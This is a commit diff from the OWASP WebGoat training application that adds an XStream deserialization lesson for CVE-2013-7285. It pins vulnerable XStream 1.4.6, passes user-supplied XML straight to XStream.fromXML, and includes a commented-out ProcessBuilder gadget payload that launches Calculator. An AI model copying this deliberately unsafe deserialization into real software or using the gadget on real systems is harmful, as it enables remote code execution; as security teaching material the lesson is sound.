Xstream RCE works now
This commit is contained in:
		| @ -259,6 +259,12 @@ | ||||
|             <artifactId>docker-maven-plugin</artifactId> | ||||
|             <version>0.4.10</version> | ||||
|         </dependency> | ||||
|          | ||||
| 		<dependency> | ||||
| 			<groupId>com.thoughtworks.xstream</groupId> | ||||
| 			<artifactId>xstream</artifactId> | ||||
| 			<version>1.4.6</version> | ||||
| 		</dependency> | ||||
|  | ||||
|         <!-- ************* END spring MVC and related dependencies ************** --> | ||||
|         <!-- ************* START: Dependencies for Unit and Integration Testing ************** --> | ||||
|  | ||||
| @ -0,0 +1,22 @@ | ||||
| package org.owasp.webgoat.plugin; | ||||
|  | ||||
| import com.thoughtworks.xstream.converters.Converter; | ||||
| import com.thoughtworks.xstream.converters.MarshallingContext; | ||||
| import com.thoughtworks.xstream.converters.UnmarshallingContext; | ||||
| import com.thoughtworks.xstream.io.HierarchicalStreamReader; | ||||
| import com.thoughtworks.xstream.io.HierarchicalStreamWriter; | ||||
|  | ||||
| public class CatchAllConverter implements Converter { | ||||
|  | ||||
|     public boolean canConvert(Class clazz) { | ||||
|         return true; | ||||
|     } | ||||
|  | ||||
|     public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) { | ||||
|     } | ||||
|  | ||||
|     public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { | ||||
|        return null; | ||||
|     } | ||||
|  | ||||
| } | ||||
| @ -0,0 +1,18 @@ | ||||
| package org.owasp.webgoat.plugin; | ||||
|  | ||||
| import com.thoughtworks.xstream.annotations.XStreamAlias; | ||||
|  | ||||
| @XStreamAlias("contact") | ||||
| public class Contact { | ||||
|     @XStreamAlias("name") | ||||
|     String name; | ||||
|  | ||||
|     public String getName() { | ||||
|         return name; | ||||
|     } | ||||
|  | ||||
|     public void setName(String name) { | ||||
|         this.name = name; | ||||
|     } | ||||
|  | ||||
| } | ||||
| @ -0,0 +1,30 @@ | ||||
| package org.owasp.webgoat.plugin; | ||||
|  | ||||
| import com.thoughtworks.xstream.converters.Converter; | ||||
| import com.thoughtworks.xstream.converters.MarshallingContext; | ||||
| import com.thoughtworks.xstream.converters.UnmarshallingContext; | ||||
| import com.thoughtworks.xstream.io.HierarchicalStreamReader; | ||||
| import com.thoughtworks.xstream.io.HierarchicalStreamWriter; | ||||
|  | ||||
| public class ContactConverter implements Converter { | ||||
|  | ||||
|     public boolean canConvert(Class clazz) { | ||||
|         return clazz.equals(Contact.class); | ||||
|     } | ||||
|  | ||||
|     public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) { | ||||
|         Contact contact = (Contact) value; | ||||
|         writer.startNode("name"); | ||||
|         writer.setValue(contact.getName()); | ||||
|         writer.endNode(); | ||||
|     } | ||||
|  | ||||
|     public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) { | ||||
|         Contact contact = new Contact(); | ||||
|         reader.moveDown(); | ||||
|         contact.setName(reader.getValue()); | ||||
|         reader.moveUp(); | ||||
|         return contact; | ||||
|     } | ||||
|  | ||||
| } | ||||
| @ -1,6 +1,7 @@ | ||||
| package org.owasp.webgoat.plugin; | ||||
|  | ||||
| import com.thoughtworks.xstream.XStream; | ||||
| import java.io.IOException; | ||||
|  | ||||
| import org.owasp.webgoat.assignments.AssignmentEndpoint; | ||||
| import org.owasp.webgoat.assignments.AssignmentPath; | ||||
| import org.owasp.webgoat.assignments.AttackResult; | ||||
| @ -9,7 +10,8 @@ import org.springframework.web.bind.annotation.RequestMethod; | ||||
| import org.springframework.web.bind.annotation.RequestParam; | ||||
| import org.springframework.web.bind.annotation.ResponseBody; | ||||
|  | ||||
| import java.io.IOException; | ||||
| import com.thoughtworks.xstream.XStream; | ||||
| import com.thoughtworks.xstream.io.xml.DomDriver; | ||||
|  | ||||
| /** | ||||
|  * ************************************************************************************************* | ||||
| @ -50,34 +52,50 @@ public class VulnerableComponentsLesson extends AssignmentEndpoint { | ||||
|  | ||||
| 	@RequestMapping(method = RequestMethod.POST) | ||||
| 	public @ResponseBody AttackResult completed(@RequestParam String payload) throws IOException { | ||||
| 		String process = "open"; 		 | ||||
| 		String arguments = "/Applications/Calculator.app";		 | ||||
|  | ||||
| 		 | ||||
| 		String payload2 = "<sorted-set>" +   | ||||
| 						 "<string>foo</string>" + | ||||
| 						 "<dynamic-proxy>" +  | ||||
| 						 "<interface>java.lang.Comparable</interface>" + | ||||
| 						 "<handler class=\"java.beans.EventHandler\">" + | ||||
| 						 "    <target class=\"java.lang.ProcessBuilder\">" + | ||||
| 						 "         <command>" + | ||||
| 						 "             <string>" + process + "</string>" + | ||||
| 						 "             <string>" + arguments + "</string>" + | ||||
| 						 "        </command>" + | ||||
| 						 "    </target>" + | ||||
| 						 "    <action>start</action>" + | ||||
| 						 "</handler>" +  | ||||
| 						 "</dynamic-proxy>" + 						 | ||||
| 						"</sorted-set>"; | ||||
| 		XStream xstream = new XStream(); | ||||
| 		String xml = (String)xstream.fromXML(payload2); | ||||
|        if (!payload.toString().equals("")) { | ||||
|             return trackProgress(success() | ||||
|                 .feedback("vulnerable-components") | ||||
|                 .feedbackArgs(xml) | ||||
|                 .build()); | ||||
|         } else { | ||||
|         XStream xstream = new XStream(new DomDriver()); | ||||
| //        xstream.processAnnotations(Contact.class); | ||||
| //        xstream.registerConverter(new ContactConverter()); | ||||
| //        xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW); | ||||
|   | ||||
| //        Contact c = new Contact(); | ||||
| //        c.setName("Alvaro"); | ||||
| //        String sc = xstream.toXML(c); | ||||
| //        System.out.println(sc); | ||||
|  | ||||
|  | ||||
| //        String payload2 = "<sorted-set>" + | ||||
| //                "<string>foo</string>" + | ||||
| //                "<dynamic-proxy>" + | ||||
| //                "<interface>java.lang.Comparable</interface>" + | ||||
| //                "<handler class=\"java.beans.EventHandler\">" + | ||||
| //                " <target class=\"java.lang.ProcessBuilder\">" + | ||||
| //                " <command>" + | ||||
| //                " <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" + | ||||
| //                " </command>" + | ||||
| //                " </target>" + | ||||
| //                " <action>start</action>" + | ||||
| //                "</handler>" + | ||||
| //                "</dynamic-proxy>" + | ||||
| //                "</sorted-set>"; | ||||
|  | ||||
|         try { | ||||
| //        	System.out.println("Payload:" + payload); | ||||
|             Contact expl = (Contact) xstream.fromXML(payload); | ||||
|             return trackProgress(success().feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build()); | ||||
|  | ||||
|         } catch (com.thoughtworks.xstream.converters.ConversionException ex) { | ||||
|         	ex.printStackTrace(); | ||||
|         	if (ex.getMessage().contains("Integer")) | ||||
|         	{ | ||||
|                 return trackProgress(success().feedback("vulnerable-components.success").build()); | ||||
|         	} | ||||
|             return trackProgress(failed().feedback("vulnerable-components.close").build()); | ||||
|         } | ||||
|  | ||||
|        } | ||||
|  | ||||
|   | ||||
|  | ||||
| 	} | ||||
| } | ||||
|  | ||||
| @ -131,6 +131,12 @@ | ||||
| 		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files, | ||||
| 		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc --> | ||||
| 		<div class="adoc-content" th:replace="doc:VulnerableComponents_content5.adoc"></div> | ||||
| 	</div> | ||||
| 	<div class="lesson-page-wrapper"> | ||||
|         <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson --> | ||||
| 		<!-- include content here, or can be placed in another location. Content will be presented via asciidocs files, | ||||
| 		which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc --> | ||||
| 		<div class="adoc-content" th:replace="doc:VulnerableComponents_content5a.adoc"></div> | ||||
| 		<div class="attack-container"> | ||||
| 			<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div> | ||||
| 			<!-- using attack-form class on your form will allow your request to be ajaxified and stay within the display framework for webgoat --> | ||||
| @ -142,9 +148,14 @@ | ||||
| 				enctype="application/json;charset=UTF-8"> | ||||
| 				<div id="lessonContent"> | ||||
| 					<form accept-charset="UNKNOWN" method="POST" name="form" | ||||
| 						action="#attack/307/100" enctype=""> | ||||
| 						Enter Your XML payload: <input name="payload" value="" type="TEXT"/><input | ||||
| 							name="SUBMIT" value="Go!" type="SUBMIT"/> | ||||
| 						action="#attack/307/100" enctype="">					 | ||||
| 						<table> | ||||
| 							<tr> | ||||
| 								<td>Enter the contact's xml representation:</td> | ||||
| 								<td><textarea name="payload" value="" type="TEXT" rows="15" cols="60"/></td> | ||||
| 								<td><input name="SUBMIT" value="Go!" type="SUBMIT"/></td> | ||||
| 							</tr> | ||||
| 						</table> | ||||
| 					</form> | ||||
| 				</div> | ||||
| 			</form> | ||||
|  | ||||
| @ -4,18 +4,17 @@ | ||||
|  | ||||
| * Is it old or is it stable | ||||
| * Was my lack of upgrade a deliberate choice or a lack of knowledge | ||||
|  | ||||
| === What is architectural risk? | ||||
|  | ||||
| * Is my component out of date | ||||
| * Is the project I'm using no longer active | ||||
| * Is my component unpopular | ||||
|  | ||||
| === Summary | ||||
|  | ||||
| === Summary? | ||||
| image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"] | ||||
| * It's really difficult to keep components up to dat | ||||
|   | ||||
|  | ||||
| For the components analyzed in 25,000 applications it was found that: | ||||
|  | ||||
| *  8% of  2 year old components did not have a newer version | ||||
| * 23% of 11 year old components did not have a newer version | ||||
|  | ||||
| image::plugin_lessons/plugin/VulnerableComponents/images/Old-Components.png[caption="Figure: ", title="Old Components", alt="Old Components", width="355", height="304", style="lesson-image"] | ||||
|  | ||||
| @ -6,8 +6,8 @@ In November of 2015, the Apache Commons Collections component latest release was | ||||
| Ref: http://www.pcworld.com/article/3004633/business-security/thousands-of-java-applications-vulnerable-to-nine-month-old-remote-code-execution-exploit.html[Thousands of Java applications vulnerable to nine-month-old remote code execution exploit] | ||||
|  | ||||
|  | ||||
| === Dinis Cruz exploit of XStream | ||||
| XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog]  | ||||
| === Dinis Cruz and pwntester exploit of XStream | ||||
| XStream, a relatively common XML and JSON parsing library, has a nasty little remote code execution. Ref: http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html[Dinis Cruz Blog] https://github.com/pwntester/XStreamPOC[pwntester/XStreamPOC]   | ||||
|  | ||||
| Let's see if you can figure out how to exploit this in WebGoat. | ||||
| You may want to read the article(s) before trying this lesson.  Let's see if you can figure out how to exploit this in WebGoat. | ||||
|  | ||||
|  | ||||
| @ -0,0 +1,14 @@ | ||||
| == Exploiting http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7285[CVE-2013-7285] (XStream) | ||||
|  | ||||
| WebGoat Sends an XML document to add contacts to a contacts database.   | ||||
| [source,xml] | ||||
| ---- | ||||
| <contact>   | ||||
|     <id>1</id> | ||||
|     <firstName>Bruce</firstName> | ||||
|     <lastName>Mayhew</lastName> | ||||
|     <email>webgoat@owasp.org</email> | ||||
| </contact>   | ||||
| ---- | ||||
|  | ||||
| For this example, we will let you enter the xml directly versus intercepting the request and modifying the data.  You provide the XML representation of a contact and WebGoat will convert it a Contact object using XStream.fromXML(xml). | ||||
| @ -1,3 +1,6 @@ | ||||
| vulnerable-components.title=Vulnerable Components | ||||
| EnterYourName=Enter your Name | ||||
| Go!=Go! | ||||
| vulnerable-components.close=Trying to deserialize null object. | ||||
| vulnerable-components.success=If you are not seeing the application you started; it may be minimized | ||||
| vulnerable-components.fromXML=You created contact {0}.  This means you did not exploit the remote code execution. | ||||
		Reference in New Issue
	
	Block a user